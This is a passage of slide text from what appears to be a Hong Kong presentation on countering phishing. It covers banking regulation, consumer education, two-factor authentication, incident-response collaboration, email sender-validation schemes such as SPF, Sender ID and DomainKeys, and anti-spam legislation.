  • 98. 3.1 Policy and User Education • – HKMA Guideline • Circular on monitoring Online Banking Regulation of Bogus web site – Regulating the use of domain name • HKMA and HKIRC cooperate in regulating the use of words “bank” and “banque” in “.hk” domain • Is a further regulation to mandate all authorized banking institutions to use “.bank.hk” a useful strategy? – Note: it still cannot stop technique like “Visual Spoofing” • Human is the weakest link – Trust too easily98 (PHISHING )
  • 99. 3.1 User Education • Consumer Education – Pamphlet “Internet Banking – Keeping Your Money Safe” • by HKAB(Hong Kong Association of Banks) http://www.hkab.org.hk/PDF/customer_info/ebanking _e.pdf – TV and Radio programs • by HKMA and HKPF – Public seminars • by HKCERT – Alerts on some bank web sites99 (PHISHING )
  • 100. 3.2 Prevention Technical • HKMA announced in June 2004 that within 12 months, all authorized institutions should deploy two-factor authentication in high risk transactions – One time password (e.g. secure ID token, SMS one time password) – Digital certificate in Smart ID Card100 (PHISHING )
  • 101. 3.2 Other Prevention & Detection • See previous sections on specific attacks101 (PHISHING )
  • 102. 3.4 Incident Response and Collaboration • Report and Alert – SFC (Security and Futures Commission) reward the report of fraudulent copycat websites and phishing scams targeting Hong Kong investors. • Smart Investor Award http://www.hksfc.org.hk/eng/investor/html/smart_investor_award.h tm – HKMA and SFC publish Unregistered financial and stock transaction web site • http://www.hkma.gov.hk • http://www.hksfc.org.hk/chi/investor/html/unlicensed_overseas_comp.htm – Quick reaction and publishing of news in Media and Press102 to alert the public (PHISHING )
  • 103. 3.4 Incident Response and Collaboration • Local Collaboration – Police, HKCERT and ISPs cooperating to close down bogus web sites in Hong Kong – Police, HKMA and HKAB has standing collaboration body, meeting regularly on banking fraud prevention and response103 (PHISHING )
  • 104. 3.4 Incident Response and Collaboration • Cross Border Collaboration – Police plays an important role in cross-border crimes like phishing – CERT Teams around the world are developing close collaboration in information exchange and pin down of bogus website Global Asia Pacific104 (PHISHING ) http://www.cert.org/csirts/images/map-full.gif
  • 105. 3.5 Long Term Development (Technology Infrastructure) PHISHING & SPAM One of the Core Issues: How to validate identity of Sender and Sender Domain, and if the Sending Mail Server is authorized? • In the current Internet Mail Infrastructure implementation, there is flaw in the validation of sender Plausible but not widely implemented methods of validation • Sender Validation – Use Digital Signature (S/MIME or PGP) • Authenticated SMTP to minimize abuse of Open Mail Relay – RFC2554 - SMTP Service Extension for Authentication – RFC2487 - SMTP Service Extension for Secure SMTP over TLS105 (PHISHING )
  • 106. 3.5 Long Term Development (Technology Infrastructure) • Domain Validation (work at DNS level) – Standard based • Reverse DNS Lookup – Proprietary Solution • AOL: SPF Sender ID • Microsoft: Caller ID • Yahoo: Domain Keys106 (PHISHING )
  • 107. Sender Policy Framework SPF DNS server of SENDER.COM 2. Recipient Mail Gateway 3. DNS server returns a list of issues a DNS query to authorized IP addresses of SENDER.COM, asking for mail servers for the list of authorized IP addresses of mail servers ? SENDER.COM 4.Check if the Sender Mail Server is in the authorized IP address. If so, the mail server is authorized and mail is forwarded to recipient’s 1.Sender sends out email from SENDER.COM mailbox SMTP Sender Recipient Mail Server Mail Gateway Recipient107 (PHISHING )
  • 108. Proprietary Domain Validation • Caller ID – “XML version of SPF” with more options • Domain Keys – Use PKI. Validate sender identity AND message integrity • Recent Development – Domain Keys was submitted as RFC to IETF – SPF merge with Caller ID to Sender ID. – SenderID submitted to IETF as RFC in July 2004; got rejected in Oct 2004 due to compatibility and IP issue. Microsoft had re-submitted with amendment. The industry is still discussing the new amendment.108 (PHISHING )
  • 109. 3.5 Long Term Development (Legislation) PHISHING & SPAM – Legislate on cross-border jurisdiction, and establish mutually accepted process to handle phishing and spamming – Legislate on anti-spam, to reduce Open Mail Relay and Directory Harvesting Attacks109 (PHISHING )
  • 110. Conclusion • Phishing adversely impacts the growth of e-Commerce • Phishermen are using both old social engineering tricks and more advanced technologies now. • Should adopt Multi-dimensional Anti-Phishing Strategies – User Education, Prevention, Detection, Incident Response and Notification – Collaboration of Law Enforcement and Business sector, and crossing the border are vital elements of success. • Hit SPAM can hit Phishing. There is a need for legislative and technological reforms.110 (PHISHING )